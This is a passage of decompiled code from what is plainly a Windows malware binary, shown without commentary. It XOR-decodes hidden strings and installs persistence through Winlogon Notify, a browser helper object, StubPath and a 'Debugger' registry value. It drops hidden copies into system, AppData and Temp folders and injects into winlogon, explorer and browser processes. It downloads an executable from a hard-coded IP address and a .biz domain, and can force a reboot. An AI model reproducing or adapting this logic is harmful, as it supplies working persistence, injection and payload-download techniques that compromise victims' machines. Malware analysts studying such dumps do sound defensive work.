											wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t1020 + 0x1f4)),  *((char*)(_t1020 + 0x1f1)),  *((char*)(_t1020 + 0x1ee)),  *((char*)(_t1020 + 0x1eb)),  *((char*)(_t1020 + 0x1e8)),  *((char*)(_t1020 + 0x1e5)),  *((char*)(_t1020 + 0x1e2)),  *((char*)(_t1020 + 0x1df)),  *((char*)(_t1020 + 0x1dc)),  *((char*)(_t1020 + 0x1d9)),  *((char*)(_t1020 + 0x1d6)),  *((char*)(_t1020 + 0x1d3)),  *((char*)(_t1020 + 0x1d0)),  *((char*)(_t1020 + 0x1cd)),  *((char*)(_t1020 + 0x1ca)),  *((char*)(_t1020 + 0x1c7)));
											_t1021 = _t1020 + 0x48;
											_t481 = 0x407aa0;
											while(1) {
												__eflags = _t481 - 0x407ad5;
												if(_t481 >= 0x407ad5) {
													break;
												}
												 *_t481 =  *_t481 ^ 0x000000d4;
												_t481 =  &(_t481[1]);
											}
											while(1) {
												__eflags = 0x4072a0 - 0x407aa0;
												if(0x4072a0 >= 0x407aa0) {
													break;
												}
												 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
												__eflags =  *0x4072a0;
												 *(_t1017 + 0x40) =  *(_t1017 + 0x40) ^ _t934;
											}
											_push(0x4122b0);
											_push(0x407aa0);
											_t888 =  &(_t1021[0x410]);
											_push(_t888);
											L00405E20();
											_push(0x4072a0);
											L00405E30();
											_t484 = RegCreateKeyA(0x80000002, _t888,  &(_t1021[0x26]));
											__eflags = _t484;
											if(_t484 != 0) {
												L159:
												_t486 = E004030DE( &(_t1021[0x1ee]));
												_t1021[0x26] = _t486;
												__eflags = _t486;
												if(_t486 == 0) {
													L179:
													_t487 = E004010B2();
													__eflags = _t487;
													_t948 = _t487;
													if(_t487 == 0) {
														_t948 = 0x42;
													}
													_t1021[0x1ee] = _t948;
													_t488 = E004010B2();
													__eflags = _t488;
													_t949 = _t488;
													if(_t488 == 0) {
														_t949 = 0x4d;
													}
													_t1021[0x162] = _t949;
													_push( *0x4120b0);
													_push( &(_t1021[0x163]));
													L00405E20();
													_push( &(_t1021[0x55a]));
													_push( &(_t1021[0x1ac]));
													L00405E20();
													_t994 = _t1021[5];
													_t492 = _t994 + _t1017;
													while(1) {
														__eflags = _t994 - _t492;
														if(_t994 >= _t492) {
															break;
														}
														 *_t994 =  *_t994 ^ _t1021[0x162] & 0x000000ff;
														_t994 =  &(_t994[0]);
														_t492 = _t1021[5] + _t1017;
													}
													_t889 =  &(_t1021[0x517]);
													_t493 = ExpandEnvironmentStringsA("%AppData%\\", _t889, 0x104);
													__eflags = _t493;
													if(_t493 == 0) {
														L190:
														_t890 =  &(_t1021[0x516]);
														_t494 = GetTempPathA(0x104, _t890);
														__eflags = _t494;
														if(_t494 == 0) {
															L198:
															E00401029(_t1021[5]);
															_t891 =  &(_t1021[0x387]);
															_t497 = GetSystemDirectoryA(_t891, 0x104);
															_push(0x80);
															_push( *0x4120c0);
															_push(0x41103e);
															_push(_t891);
															L00405E30();
															L00405E30();
															SetFileAttributesA(_t497, _t497);
															_t499 = CreateFileA(_t891, 0x40000000, 0, 0, 2, 0x80, 0);
															_t1021[0x28] = _t499;
															__eflags = _t499;
															if(_t499 == 0) {
																L205:
																_t500 = GetLastError();
																__eflags = _t500 - 0x20;
																if(_t500 != 0x20) {
																	_t892 =  &(_t1021[0x387]);
																	_t501 = ExpandEnvironmentStringsA("%AppData%\\", _t892, 0x104);
																	_push(0x80);
																	_push( *0x4120c0);
																	L00405E30();
																	SetFileAttributesA(_t501, _t892);
																	_t503 = CreateFileA(_t892, 0x40000000, 0, 0, 2, 0x80, 0);
																	_t1021[0x28] = _t503;
																	__eflags = _t503;
																	if(_t503 == 0) {
																		L209:
																		_t504 = GetLastError();
																		__eflags = _t504 - 0x20;
																		if(_t504 == 0x20) {
																			goto L206;
																		}
																		_t675 = GetTempPathA(0x104, _t892);
																		_push(0x80);
																		_push( *0x4120c0);
																		L00405E30();
																		SetFileAttributesA(_t675, _t892);
																		_t677 = CreateFileA(_t892, 0x40000000, 0, 0, 2, 0x80, 0);
																		_t1021[0x28] = _t677;
																		__eflags = _t677;
																		if(_t677 == 0) {
																			L212:
																			_t678 = GetLastError();
																			__eflags = _t678 - 0x20;
																			if(_t678 == 0x20) {
																				goto L206;
																			}
																			L215:
																			_t893 =  &(_t1021[0x343]);
																			_t509 = ExpandEnvironmentStringsA("%AppData%\\", _t893, 0x104);
																			_push(0x80);
																			_push( *0x4120d0);
																			L00405E30();
																			SetFileAttributesA(_t509, _t893);
																			_t511 = CreateFileA(_t893, 0x40000000, 0, 0, 2, 0x80, 0);
																			_t1021[0x28] = _t511;
																			__eflags = _t511;
																			_t950 = _t511;
																			if(_t511 == 0) {
																				L217:
																				_t894 =  &(_t1021[0x342]);
																				_t512 = GetTempPathA(0x104, _t894);
																				_push(0x80);
																				_push( *0x4120d0);
																				L00405E30();
																				SetFileAttributesA(_t512, _t894);
																				_t514 = CreateFileA(_t894, 0x40000000, 0, 0, 2, 0x80, 0);
																				_t1021[0x28] = _t514;
																				__eflags = _t514;
																				_t950 = _t514;
																				if(_t514 == 0) {
																					L220:
																					_t1021[0x342] = 0;
																					L221:
																					__eflags = _t1021[0x342];
																					if(_t1021[0x342] != 0) {
																						CreateFileA( &(_t1021[0x348]), 0x80000000, 1, 0, 3, 0, 0);
																					}
																					_t895 =  &(_t1021[0x2b]);
																					GetSystemDirectoryA(_t895, 0x104);
																					_push(0x41103e);
																					_push(_t895);
																					L00405E30();
																					E004012C2(_t895);
																					ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t895, 0x104);
																					E004012C2(_t895);
																					ExpandEnvironmentStringsA("%AppData%\\", _t895, 0x104);
																					E004012C2(_t895);
																					_t524 = 0x407220;
																					while(1) {
																						__eflags = _t524 - 0x40724d;
																						if(_t524 >= 0x40724d) {
																							break;
																						}
																						 *_t524 =  *_t524 ^ 0x000000d4;
																						_t524 =  &(_t524[1]);
																					}
																					_t525 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t1021[0x26]));
																					__eflags = _t525;
																					if(_t525 == 0) {
																						L228:
																						__eflags = _t1021[0xb];
																						if(_t1021[0xb] == 0) {
																							_t908 =  &(_t1021[0x55a]);
																							_t665 = E00401251(_t1021[0x26]);
																							_push(_t908);
																							L00405E40();
																							_t666 = _t665 + 1;
																							__eflags = _t666;
																							RegSetValueExA(_t1021[0x2b],  *0x4120b0, 0, 1, _t908, _t666);
																						}
																						RegDeleteValueA(_t1021[0x27], "winrnt.exe");
																						RegCloseKey(_t1021[0x26]);
																						L231:
																						__eflags =  *0x412100 - 2;
																						if( *0x412100 != 2) {
																							L271:
																							CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t1021[0x27])));
																							_t530 = 0x407000;
																							while(1) {
																								__eflags = _t530 - 0x407060;
																								if(_t530 >= 0x407060) {
																									break;
																								}
																								 *_t530 =  *_t530 ^ 0x000000d4;
																								_t530 =  &(_t530[1]);
																							}
																							_t1021[0xc] = 0;
																							while(1) {
																								E004011CF(0x80000002, 0x407000);
																								__eflags = _t1021[0xc] - 9;
																								if(_t1021[0xc] <= 9) {
																									goto L310;
																								}
																								_t1021[0x16] = 0;
																								_t1021[0x17] = 0;
																								_t589 = E004025C3();
																								__eflags = _t589;
																								if(_t589 != 0) {
																									L307:
																									 *_t1021 = 0;
																									L311:
																									_t1021[0xd] = 0x3b;
																									do {
																										__eflags = _t1021[0x342];
																										if(_t1021[0x342] != 0) {
																											_push(0);
																											_push("opera.exe");
																											_push("seamonkey.exe");
																											_push("mozilla.exe");
																											_push("firefox.exe");
																											_push("iexplore.exe");
																											_push("explorer.exe");
																											E0040318D( &(_t1021[0x349]));
																											_t1021 =  &(_t1021[8]);
																										}
																										__eflags = _t1021[0xa];
																										if(_t1021[0xa] != 0) {
																											_t899 =  &(_t1021[0x3cb]);
																											SetFileAttributesA(_t899, 0x21);
																											_t566 = RegCreateKeyA(0x80000002,  &(_t1021[0x40f]),  &(_t1021[0x26]));
																											__eflags = _t566;
																											if(_t566 == 0) {
																												E00401251(_t1021[0x26]);
																												_t1021[0x27] = 1;
																												_t570 = RegSetValueExA(_t1021[0x2b], "IsInstalled", 0, 4,  &(_t1021[0x28]), 4);
																												_push(_t899);
																												L00405E40();
																												_t571 = _t570 + 1;
																												__eflags = _t571;
																												RegSetValueExA(_t1021[0x2b], "StubPath", 0, 1, _t899, _t571);
																												RegCloseKey(_t1021[0x26]);
																											}
																										}
																										__eflags = _t1021[0xb];
																										_t995 =  &(_t1021[0x26]);
																										if(_t1021[0xb] == 0) {
																											_t533 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006, _t995);
																											__eflags = _t533;
																											if(_t533 == 0) {
																												L322:
																												_t896 =  &(_t1021[0x55a]);
																												_push(_t896);
																												L00405E40();
																												_t534 = _t533 + 1;
																												__eflags = _t534;
																												_push(_t534);
																												_push(_t896);
																												_push(1);
																												_push(0);
																												_push( *0x4120b0);
																												goto L323;
																											}
																											_t533 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006, _t995);
																											__eflags = _t533;
																											if(_t533 != 0) {
																												goto L324;
																											}
																											goto L322;
																										} else {
																											_t900 =  &(_t1021[0x48f]);
																											SetFileAttributesA(_t900, 0x21);
																											_t540 = RegCreateKeyA(0x80000002, 0x408720, _t995);
																											__eflags = _t540;
																											if(_t540 != 0) {
																												L324:
																												__eflags = _t1021[9];
																												if(_t1021[9] == 0) {
																													goto L334;
																												}
																												_t897 =  &(_t1021[0x27]);
																												_t541 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t897, 0);
																												__eflags = _t541;
																												if(_t541 == 0) {
																													L327:
																													RegSetValueExA(_t1021[0x2b], "SubshellState", 0, 3,  &(_t1021[0x1ef]), 0x22a);
																													RegCloseKey(_t1021[0x26]);
																													L328:
																													_t898 =  &(_t1021[0x387]);
																													SetFileAttributesA(_t898, 0x21);
																													__eflags =  *0x412100 - 2;
																													_t998 =  &(_t1021[0x26]);
																													if( *0x412100 != 2) {
																														_t546 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t998);
																														__eflags = _t546;
																														if(_t546 != 0) {
																															goto L334;
																														}
																														_push(_t898);
																														L00405E40();
																														RegSetValueExA(_t1021[0x2b], 0, 0, 1, _t898, _t546 + 1);
																														RegSetValueExA(_t1021[0x2b], "ThreadingModel", 0, 1, "Both", 5);
																														RegCloseKey(_t1021[0x26]);
																														_t551 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t998);
																														__eflags = _t551;
																														if(_t551 != 0) {
																															goto L334;
																														}
																														L333:
																														RegCloseKey(_t1021[0x26]);
																														goto L334;
																													}
																													_t553 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}", _t998);
																													__eflags = _t553;
																													if(_t553 != 0) {
																														goto L334;
																													}
																													_t555 = E00401251(_t1021[0x26]);
																													_push(_t898);
																													L00405E40();
																													RegSetValueExA(_t1021[0x2b], "DLLName", 0, 1, _t898, _t555 + 1);
																													RegSetValueExA(_t1021[0x2b], "Startup", 0, 1, "Startup", 8);
																													goto L333;
																												}
																												_t559 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t897, 0);
																												__eflags = _t559;
																												if(_t559 != 0) {
																													goto L328;
																												}
																												goto L327;
																											}
																											_t561 = E00401251(_t1021[0x26]);
																											_push(_t900);
																											L00405E40();
																											_push(_t561 + 1);
																											_push(_t900);
																											_push(1);
																											_push(0);
																											_push("Debugger");
																											L323:
																											RegSetValueExA(_t1021[0x2b], ??, ??, ??, ??, ??);
																											RegCloseKey(_t1021[0x26]);
																											goto L324;
																										}
																										L334:
																										SetFileAttributesA( &(_t1021[0x55b]), 0x21);
																										Sleep(0x3e8);
																										_t415 =  &(_t1021[0xd]);
																										 *_t415 = _t1021[0xd] - 1;
																										__eflags =  *_t415;
																									} while ( *_t415 >= 0);
																									_t577 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &(_t1021[0x12]), 0);
																									__eflags = _t577;
																									if(_t577 == 0) {
																										_t1021[0x10] = 4;
																										_t904 =  &(_t1021[0x10]);
																										_t579 = RegQueryValueExA(_t1021[0x16], "g00d d0gg", 0, 0, _t904,  &(_t1021[0x10]));
																										__eflags = _t579;
																										if(_t579 == 0) {
																											_t582 = _t1021[0xf] - 1;
																											__eflags = _t582;
																											_t1021[0xf] = _t582;
																											if(_t582 == 0) {
																												RegDeleteValueA(_t1021[0x12], "g00d d0gg");
																												Sleep(0x1388);
																												__eflags =  *0x412100 - 2;
																												if( *0x412100 != 2) {
																													ExitWindowsEx(6, 0);
																												} else {
																													RtlAdjustPrivilege(0x13, 1, 0,  &(_t1021[0xe]));
																													 *0x412240(1);
																												}
																											} else {
																												RegSetValueExA(_t1021[0x16], "g00d d0gg", 0, 4, _t904, 4);
																											}
																										}
																										RegCloseKey(_t1021[0x11]);
																									}
																									continue;
																								}
																								_t591 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &(_t1021[0x1c]), 0);
																								__eflags = _t591;
																								if(_t591 != 0) {
																									__eflags =  *_t1021;
																									if( *_t1021 == 0) {
																										goto L311;
																									}
																									L309:
																									_t1021[0xc] = 0;
																									goto L311;
																								}
																								_t1018 =  &(_t1021[0x19]);
																								GetSystemTimeAsFileTime(_t1018);
																								_t1021[0x18] = 8;
																								_t988 =  &(_t1021[0x17]);
																								_t593 = RegQueryValueExA(_t1021[0x20], "ConnPred", 0,  &(_t1021[0x17]), _t988,  &(_t1021[0x18]));
																								__eflags = _t593;
																								if(_t593 != 0) {
																									L280:
																									__eflags = E004014D8(_t1018, 0x412070) - 0x4af;
																									if(__eflags <= 0) {
																										L291:
																										__eflags =  *0x412080;
																										if( *0x412080 == 0) {
																											L294:
																											_t1021[0x18] = 8;
																											__eflags = RegQueryValueExA(_t1021[0x20], "UseExtProfile", 0,  &(_t1021[0x17]), _t988,  &(_t1021[0x18]));
																											if(__eflags != 0) {
																												L296:
																												_t598 = E00402427(__eflags);
																												__eflags = _t598;
																												if(_t598 != 0) {
																													L306:
																													RegCloseKey(_t1021[0x1b]);
																													goto L307;
																												}
																												_push(1);
																												_push(0);
																												_t601 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																												__eflags = _t601;
																												if(_t601 == 0) {
																													L299:
																													_t1021[0x18] = 8;
																													_t902 =  &(_t1021[0x13]);
																													_t603 = RegQueryValueExA(_t1021[0x20], "UseDflProfile", 0,  &(_t1021[0x17]),  &(_t1021[0x13]),  &(_t1021[0x18]));
																													__eflags = _t603;
																													if(_t603 != 0) {
																														_t612 = _t1021[0x16] + 0x1162f100;
																														__eflags = _t612;
																														asm("adc edx, 0xffffff9b");
																														_t1021[0x12] = _t612;
																														_t1021[0x13] = _t1021[0x17];
																													}
																													__eflags = E004014D8( &(_t1021[0x19]), _t902) - 0x152ab;
																													if(__eflags <= 0) {
																														goto L306;
																													} else {
																														_t606 = E00402427(__eflags);
																														__eflags = _t606;
																														if(_t606 != 0) {
																															goto L306;
																														}
																														_push(3);
																														_push(0);
																														_t608 = E0040211B("tombul.gif", 0);
																														__eflags = _t608;
																														if(_t608 == 0) {
																															goto L306;
																														}
																														_push(8);
																														_push(_t1018);
																														_push(0xb);
																														_push(0);
																														_push("UseDflProfile");
																														L305:
																														RegSetValueExA(_t1021[0x20], ??, ??, ??, ??, ??);
																														RegCloseKey(_t1021[0x1b]);
																														 *_t1021 = 1;
																														goto L309;
																													}
																												}
																												_t1021[0x16] = _t1021[0x19].dwLowDateTime;
																												_t1021[0x17] = _t1021[0x1a];
																												_push(8);
																												_push(_t1018);
																												_push(0xb);
																												_push(0);
																												_push("UseExtProfile");
																												goto L305;
																											}
																											__eflags = E004014D8( &(_t1021[0x19]),  &(_t1021[0x16])) - 0x152ab;
																											if(__eflags <= 0) {
																												goto L299;
																											}
																											goto L296;
																										}
																										_push(3);
																										_push(0);
																										_t617 = E0040211B("grazie.gif", 0);
																										__eflags = _t617;
																										if(_t617 == 0) {
																											goto L294;
																										}
																										_t1021[0x16] = _t1021[0x19].dwLowDateTime;
																										_t1021[0x17] = _t1021[0x1a];
																										_push(8);
																										_push(_t1018);
																										_push(0xb);
																										_push(0);
																										_push("ConnPred");
																										goto L305;
																									}
																									_t619 = E00402427(__eflags);
																									__eflags = _t619;
																									if(_t619 != 0) {
																										goto L306;
																									}
																									_t621 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																									_t997 = 0;
																									__eflags = _t621;
																									_t903 = _t621;
																									if(_t621 != 0) {
																										_t626 = E00401E00(_t621,  &(_t1021[0x15]), 2);
																										__eflags = _t626 - 2;
																										if(_t626 == 2) {
																											_t997 = 1;
																										}
																									}
																									E00401F59(_t903);
																									__eflags = _t997;
																									if(_t997 == 0) {
																										 *0x412080 = 0;
																									} else {
																										 *0x412070 = _t1021[0x19];
																										_t625 = 0;
																										__eflags = _t1021[0x14] - 0x49;
																										 *0x412074 = _t1021[0x1a];
																										if(_t1021[0x14] == 0x49) {
																											__eflags = _t1021[0x14] - 0x54;
																											if(_t1021[0x14] == 0x54) {
																												_t625 = 1;
																											}
																										}
																										 *0x412080 = _t625;
																									}
																									goto L291;
																								}
																								_t628 = E004014D8(_t1018, _t988);
																								__eflags = _t628 - 0x152ab;
																								if(_t628 <= 0x152ab) {
																									goto L294;
																								}
																								goto L280;
																								L310:
																								_t378 =  &(_t1021[0xc]);
																								 *_t378 = _t1021[0xc] + 1;
																								__eflags =  *_t378;
																								goto L311;
																							}
																						}
																						_t629 = 0x4071e0;
																						while(1) {
																							__eflags = _t629 - 0x407214;
																							if(_t629 >= 0x407214) {
																								break;
																							}
																							 *_t629 =  *_t629 ^ 0x000000d4;
																							_t629 =  &(_t629[1]);
																						}
																						_t630 = 0x4071c3;
																						while(1) {
																							__eflags = _t630 - 0x4071cf;
																							if(_t630 >= 0x4071cf) {
																								break;
																							}
																							 *_t630 =  *_t630 ^ 0x000000d4;
																							_t630 =  &(_t630[1]);
																						}
																						_t999 =  &(_t1021[0x26]);
																						_t631 = RegCreateKeyA(0x80000002, 0x4071e0, _t999);
																						__eflags = _t631;
																						if(_t631 == 0) {
																							RegSetValueExA(_t1021[0x2b], 0x4071c3, 0, 4,  &(_t1021[0x28]), 4);
																							RegCloseKey(_t1021[0x26]);
																						}
																						_t632 = 0x4071a0;
																						while(1) {
																							__eflags = _t632 - 0x4071c2;
																							if(_t632 >= 0x4071c2) {
																								break;
																							}
																							 *_t632 =  *_t632 ^ 0x000000d4;
																							_t632 =  &(_t632[1]);
																						}
																						_t633 = 0x407177;
																						while(1) {
																							__eflags = _t633 - 0x407188;
																							if(_t633 >= 0x407188) {
																								break;
																							}
																							 *_t633 =  *_t633 ^ 0x000000d4;
																							_t633 =  &(_t633[1]);
																						}
																						_t634 = 0x407160;
																						while(1) {
																							__eflags = _t634 - 0x407176;
																							if(_t634 >= 0x407176) {
																								break;
																							}
																							 *_t634 =  *_t634 ^ 0x000000d4;
																							_t634 =  &(_t634[1]);
																						}
																						_t635 = 0x40714a;
																						while(1) {
																							__eflags = _t635 - 0x40715f;
																							if(_t635 >= 0x40715f) {
																								break;
																							}
																							 *_t635 =  *_t635 ^ 0x000000d4;
																							_t635 =  &(_t635[1]);
																						}
																						_t636 = 0x407135;
																						while(1) {
																							__eflags = _t636 - 0x407149;
																							if(_t636 >= 0x407149) {
																								break;
																							}
																							 *_t636 =  *_t636 ^ 0x000000d4;
																							_t636 =  &(_t636[1]);
																						}
																						_t637 = RegOpenKeyExA(0x80000002, 0x4071a0, 0, 0x20006, _t999);
																						__eflags = _t637;
																						if(_t637 == 0) {
																							_t907 =  &(_t1021[0x28]);
																							RegSetValueExA(_t1021[0x2b], 0x407177, 0, 4, _t907, 4);
																							RegSetValueExA(_t1021[0x2b], 0x407160, 0, 4, _t907, 4);
																							RegSetValueExA(_t1021[0x2b], 0x40714a, 0, 4, _t907, 4);
																							RegSetValueExA(_t1021[0x2b], 0x407135, 0, 4, _t907, 4);
																							RegCloseKey(_t1021[0x26]);
																						}
																						_t638 = 0x4070c0;
																						while(1) {
																							__eflags = _t638 - 0x407134;
																							if(_t638 >= 0x407134) {
																								break;
																							}
																							 *_t638 =  *_t638 ^ 0x000000d4;
																							_t638 =  &(_t638[1]);
																						}
																						_t639 = RegOpenKeyExA(0x80000002, 0x4070c0, 0, 0x2001f, _t999);
																						__eflags = _t639;
																						if(_t639 != 0) {
																							goto L271;
																						}
																						_t641 = E00401000(0x8000);
																						_t1021[0x1d] = 0x4000;
																						_t1000 = _t641;
																						_t642 = 0x407080;
																						_t1021[0x27] = 0x4000;
																						while(1) {
																							__eflags = _t642 - 0x4070a4;
																							if(_t642 >= 0x4070a4) {
																								break;
																							}
																							 *_t642 =  *_t642 ^ 0x000000d4;
																							_t642 =  &(_t642[1]);
																						}
																						_t1021[0xd] = 0;
																						while(1) {
																							_t325 =  &(_t1000[0x4000]); // 0x4000
																							_t905 = _t325;
																							_t646 = RegEnumValueA(_t1021[0x2d], _t1021[0x13], _t1000,  &(_t1021[0x2b]), 0,  &(_t1021[0x1e]), _t325,  &(_t1021[0x1d]));
																							__eflags = _t646;
																							if(_t646 != 0) {
																								break;
																							}
																							__eflags = _t1021[0x1c] - 1;
																							if(_t1021[0x1c] == 1) {
																								_t648 = E00401311(_t905, 0x40708d);
																								__eflags = _t648;
																								if(_t648 != 0) {
																									RegDeleteValueA(_t1021[0x27], _t1000);
																								}
																							}
																							_t320 =  &(_t1021[0xd]);
																							 *_t320 = _t1021[0xd] + 1;
																							__eflags =  *_t320;
																							_t1021[0x1d] = 0x4000;
																							_t1021[0x27] = 0x4000;
																						}
																						_t906 =  &(_t1021[0x55a]);
																						_t651 = wsprintfA(_t1000, 0x407080, _t906) + 1;
																						__eflags = _t651;
																						_t1021 =  &(_t1021[3]);
																						RegSetValueExA(_t1021[0x2b], _t906, 0, 1, _t1000, _t651);
																						E00401029(_t1000);
																						RegCloseKey(_t1021[0x26]);
																						goto L271;
																					}
																					_t669 = RegOpenKeyExA(0x80000001, 0x407220, 0, 0x20006,  &(_t1021[0x26]));
																					__eflags = _t669;
																					if(_t669 != 0) {
																						goto L231;
																					}
																					goto L228;
																				}
																				__eflags = _t514 - 0xffffffff;
																				if(_t514 == 0xffffffff) {
																					goto L220;
																				}
																				L219:
																				WriteFile(_t950, 0x408840, 0x5e00,  &(_t1021[0x28]), 0);
																				CloseHandle(_t1021[0x28]);
																				goto L221;
																			}
																			__eflags = _t511 - 0xffffffff;
																			if(_t511 != 0xffffffff) {
																				goto L219;
																			}
																			goto L217;
																		}
																		__eflags = _t677 + 1;
																		if(_t677 + 1 != 0) {
																			L200:
																			WriteFile(_t1021[0x2c], 0x40e640, 0x1400,  &(_t1021[0x28]), 0);
																			__eflags = _t1021[3];
																			if(_t1021[3] != 0) {
																				SetFileTime(_t1021[0x2b],  &(_t1021[0x21]),  &(_t1021[0x22]),  &(_t1021[0x23]));
																			}
																			CloseHandle(_t1021[0x28]);
																			_t1021[9] = 1;
																			_push(0);
																			_push("winlogon.exe");
																			_t909 =  &(_t1021[0x388]);
																			_t683 = E0040318D(_t909);
																			_t1021 =  &(_t1021[3]);
																			__eflags = _t683;
																			if(_t683 == 0) {
																				_push(0);
																				_push("explorer.exe");
																				E0040318D(_t909);
																				_t1021 =  &(_t1021[3]);
																			}
																			_push(0);
																			_push("kernel32.dll");
																			_push(_t909);
																			L214:
																			E0040318D();
																			_t1021 =  &(_t1021[3]);
																			CreateFileA( &(_t1021[0x38c]), 0x80000000, 1, 0, 3, 0, 0);
																			goto L215;
																		}
																		goto L212;
																	}
																	__eflags = _t503 + 1;
																	if(_t503 + 1 != 0) {
																		goto L200;
																	}
																	goto L209;
																}
																L206:
																_t1021[9] = 1;
																_push(0);
																_push("kernel32.dll");
																_push( &(_t1021[0x388]));
																goto L214;
															}
															__eflags = _t499 + 1;
															if(_t499 + 1 == 0) {
																goto L205;
															}
															goto L200;
														} else {
															_t1001 =  &(_t1021[0x16a]);
															_t691 = GetTempFileNameA(_t890, "tmp", 0, _t1001);
															__eflags = _t691;
															if(_t691 == 0) {
																goto L198;
															}
															_t692 = CreateFileA(_t1001, 0x40000000, 0, 0, 2, 0x80, 0);
															_t1021[0x28] = _t692;
															__eflags = _t692;
															if(_t692 == 0) {
																goto L198;
															}
															__eflags = _t692 + 1;
															if(_t692 + 1 == 0) {
																goto L198;
															}
															L195:
															WriteFile(_t1021[0x2c], _t1021[8], _t1017,  &(_t1021[0x28]), 0);
															CloseHandle(_t1021[0x28]);
															CreateFileA( &(_t1021[0x170]), 0x80000000, 1, 0, 3, 0, 0);
															_t1002 =  &(_t1021[0x1ee]);
															_t974 =  &(_t1021[0x162]);
															_t938 =  &(_t1021[0x278]);
															while(1) {
																__eflags = _t1002 - _t938;
																if(_t1002 >= _t938) {
																	goto L198;
																}
																_t700 = _t1021[0x1ee] & 0x000000ff ^  *_t974;
																_t974 =  &(_t974[0]);
																 *_t1002 = _t700;
																_t1002 =  &(_t1002[1]);
															}
															goto L198;
														}
													}
													_t1003 =  &(_t1021[0x16a]);
													_push(_t1003);
													_push(0);
													_push(0x411040);
													_push(_t889);
													L00405E90();
													__eflags = _t493;
													if(_t493 == 0) {
														goto L190;
													}
													_push(0);
													_push(0x80);
													_push(2);
													_push(0);
													_push(0);
													_push(0x40000000);
													_push(_t1003);
													L00405DB0();
													_t1021[0x28] = _t493;
													__eflags = _t493;
													if(_t493 == 0) {
														goto L190;
													}
													__eflags = _t493 + 1;
													if(_t493 + 1 != 0) {
														goto L195;
													}
													goto L190;
												}
												RegDeleteValueA(_t486, "SubshellState");
												RegCloseKey(_t1021[0x26]);
												_t1004 =  &(_t1021[0x1ee]);
												_t975 =  &(_t1021[0x162]);
												_t939 =  &(_t1021[0x278]);
												while(1) {
													__eflags = _t1004 - _t939;
													if(_t1004 >= _t939) {
														break;
													}
													_t727 = _t1021[0x1ee] & 0x000000ff ^  *_t1004;
													_t1004 =  &(_t1004[0]);
													 *_t975 = _t727;
													_t975 =  &(_t975[1]);
												}
												_push( *0x4120b0);
												_t706 =  &(_t1021[0x163]);
												_push(_t706);
												L00405E50();
												__eflags = _t706;
												if(_t706 != 0) {
													L165:
													_t910 =  &(_t1021[0x16b]);
													SetFileAttributesA(_t910, 0x80);
													DeleteFileA(_t910);
													goto L179;
												}
												_push( &(_t1021[0x55a]));
												_t710 =  &(_t1021[0x1ac]);
												_push(_t710);
												L00405E50();
												__eflags = _t710;
												if(_t710 == 0) {
													_t712 = CreateFileA( &(_t1021[0x170]), 0x80000000, 1, 0, 3, 0, 0);
													_t1021[0x28] = _t712;
													__eflags = _t712;
													if(_t712 == 0) {
														goto L165;
													}
													__eflags = _t712 - 0xffffffff;
													if(_t712 == 0xffffffff) {
														goto L165;
													}
													_t713 = GetFileSize(_t712, 0);
													_t1021[0x1d] = _t713;
													__eflags = _t713 - _t1017;
													if(_t713 == _t1017) {
														_t716 = E00401000(_t1017);
														_t1005 = _t716;
														ReadFile(_t1021[0x2c], _t716, _t1017,  &(_t1021[0x28]), 0);
														_t911 = _t1021[0x1d];
														_t976 = _t1005;
														_t989 = _t1021[5];
														__eflags = _t1005 - _t1005 + _t911;
														while(__eflags < 0) {
															_t940 =  *_t976 & 0x000000ff;
															__eflags = _t1021[0x162] - ( *_t989 & 0x000000ff);
															if(__eflags == 0) {
																__eflags = _t940;
															}
															if(__eflags == 0) {
																_t976 =  &(_t976[1]);
																_t989 =  &(_t989[1]);
																__eflags = _t976 - _t1005 + _t911;
																continue;
															} else {
																E00401029(_t1005);
																goto L169;
															}
														}
														E00401029(_t1005);
														goto L198;
													}
													L169:
													CloseHandle(_t1021[0x28]);
												}
												goto L165;
											}
											_t912 =  &(_t1021[0x3cb]);
											_t728 = GetSystemDirectoryA(_t912, 0x104);
											_push( *0x412090);
											_push(0x41103e);
											_push(_t912);
											L00405E30();
											_push(_t728);
											L00405E30();
											_t729 = 0x407260;
											while(1) {
												__eflags = _t729 - 0x407286;
												if(_t729 >= 0x407286) {
													break;
												}
												 *_t729 =  *_t729 ^ 0x000000d4;
												_t729 =  &(_t729[1]);
											}
											_t730 = CreateMutexA(0, 0, "h`r@");
											_t1021[0x28] = _t730;
											__eflags = _t730;
											if(_t730 == 0) {
												Sleep(0x7d0);
											} else {
												WaitForSingleObject(_t730, 0x2710);
												CloseHandle(_t1021[0x28]);
											}
											_t913 =  &(_t1021[0x3cb]);
											SetFileAttributesA(_t913, 0x80);
											_t732 = CreateFileA(_t913, 0x40000000, 0, 0, 2, 0x80, 0);
											_t1021[0x28] = _t732;
											__eflags = _t732;
											if(_t732 == 0) {
												L158:
												RegCloseKey(_t1021[0x26]);
												RegDeleteKeyA(0x80000001,  &(_t1021[0x40e]));
												goto L159;
											} else {
